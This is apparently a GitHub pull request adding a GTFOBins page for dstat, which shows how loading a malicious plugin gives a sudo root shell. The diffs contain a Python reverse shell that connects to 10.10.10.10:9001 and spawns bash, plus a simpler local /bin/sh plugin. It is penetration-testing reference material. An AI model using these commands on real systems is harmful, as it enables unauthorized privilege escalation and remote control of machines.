### PR TITLE
Create page for dstat (sudo privesc)

### DIFF
--- a/_gtfobins/dstat.md
+++ b/_gtfobins/dstat.md
@@ -4,7 +4,14 @@ functions:
     - description: |
         Spawn interactive root shell by loading a custom plugin.
 
-        Dstat allows you to run arbitrary python scripts loaded as "external plugins" if they are located in one of these directories: `~/.dstat/`, `(path of binary)/plugins/`, `/usr/share/dstat/` or `/usr/local/share/dstat/` (as stated in the dstat man page under "FILES"). Given that you have write access to one of these directories, you can drop there a script `dstat_revshell.py` and tell dstat to run it like this:
+        Dstat allows you to run arbitrary python scripts loaded as "external plugins" if they are located in one of the directories stated in the dstat man page under "FILES":
+
+        1. `~/.dstat/`
+        2. `(path of binary)/plugins/`
+        3. `/usr/share/dstat/`
+        4. `/usr/local/share/dstat/`
+
+        Given that you have write access to one of these directories, you can drop there a script `dstat_revshell.py` and tell dstat to run it like this:
       code: |
         cat >~/.dstat/dstat_revshell.py<<EOF
         #!/usr/bin/python3
@@ -12,12 +19,12 @@ functions:
         from subprocess import run
         import socket
         s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-        s.connect(("10.10.10.10",9001)) 
-        dup2(s.fileno(),0) 
-        dup2(s.fileno(),1) 
-        dup2(s.fileno(),2) 
+        s.connect(("10.10.10.10",9001))
+        dup2(s.fileno(),0)
+        dup2(s.fileno(),1)
+        dup2(s.fileno(),2)
         run(["/bin/bash","-i"])
         EOF
-        
+
         sudo dstat --revshell
 ---

--- a/_gtfobins/dstat.md
+++ b/_gtfobins/dstat.md
@@ -1,30 +1,21 @@
 ---
+description: |
+  `dstat` allows you to run arbitrary Python scripts loaded as "external plugins" if they are located in one of the directories stated in the `dstat` man page under "FILES":
+
+  1. `~/.dstat/`
+  2. `(path of binary)/plugins/`
+  3. `/usr/share/dstat/`
+  4. `/usr/local/share/dstat/`
+
+  Pick the one that you can write into.
 functions:
+  shell:
+    - code: |
+        mkdir -p ~/.dstat
+        echo 'import os; os.execv("/bin/sh", ["sh"])' >~/.dstat/dstat_xxx.py
+        dstat --xxx
   sudo:
-    - description: |
-        Spawn interactive root shell by loading a custom plugin.
-
-        Dstat allows you to run arbitrary python scripts loaded as "external plugins" if they are located in one of the directories stated in the dstat man page under "FILES":
-
-        1. `~/.dstat/`
-        2. `(path of binary)/plugins/`
-        3. `/usr/share/dstat/`
-        4. `/usr/local/share/dstat/`
-
-        Given that you have write access to one of these directories, you can drop there a script `dstat_revshell.py` and tell dstat to run it like this:
-      code: |
-        cat >~/.dstat/dstat_revshell.py<<EOF
-        #!/usr/bin/python3
-        from os import dup2
-        from subprocess import run
-        import socket
-        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-        s.connect(("10.10.10.10",9001))
-        dup2(s.fileno(),0)
-        dup2(s.fileno(),1)
-        dup2(s.fileno(),2)
-        run(["/bin/bash","-i"])
-        EOF
-
-        sudo dstat --revshell
+    - code: |
+        echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
+        sudo dstat --xxx
 ---

--- a/_gtfobins/dstat.md
+++ b/_gtfobins/dstat.md
@@ -1,0 +1,23 @@
+---
+functions:
+  sudo:
+    - description: |
+        Spawn interactive root shell by loading a custom plugin.
+
+        Dstat allows you to run arbitrary python scripts loaded as "external plugins" if they are located in one of these directories: `~/.dstat/`, `(path of binary)/plugins/`, `/usr/share/dstat/` or `/usr/local/share/dstat/` (as stated in the dstat man page under "FILES"). Given that you have write access to one of these directories, you can drop there a script `dstat_revshell.py` and tell dstat to run it like this:
+      code: |
+        cat >~/.dstat/dstat_revshell.py<<EOF
+        #!/usr/bin/python3
+        from os import dup2
+        from subprocess import run
+        import socket
+        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+        s.connect(("10.10.10.10",9001)) 
+        dup2(s.fileno(),0) 
+        dup2(s.fileno(),1) 
+        dup2(s.fileno(),2) 
+        run(["/bin/bash","-i"])
+        EOF
+        
+        sudo dstat --revshell
+---


### PR DESCRIPTION
Happy new year 🎉 
First time contributing to this great project! I think this page fits the [guidelines](https://gtfobins.github.io/contribute/), but I might be wrong. There was no page for the `dstat` binary, so I created one. Feel free to edit/rephrase the page in your own taste.

I got inspired by the [page about `yum`](https://gtfobins.github.io/gtfobins/yum/) because this privilege escalation trick also works by loading a custom external plugin, given that you have write access to one of the plugins locations stated in the [dstat man page ](https://manpages.org/dstat) under "FILES":
- `~/.dstat/`
- `(path of binary)/plugins/`
- `/usr/share/dstat/`
- `/usr/local/share/dstat/`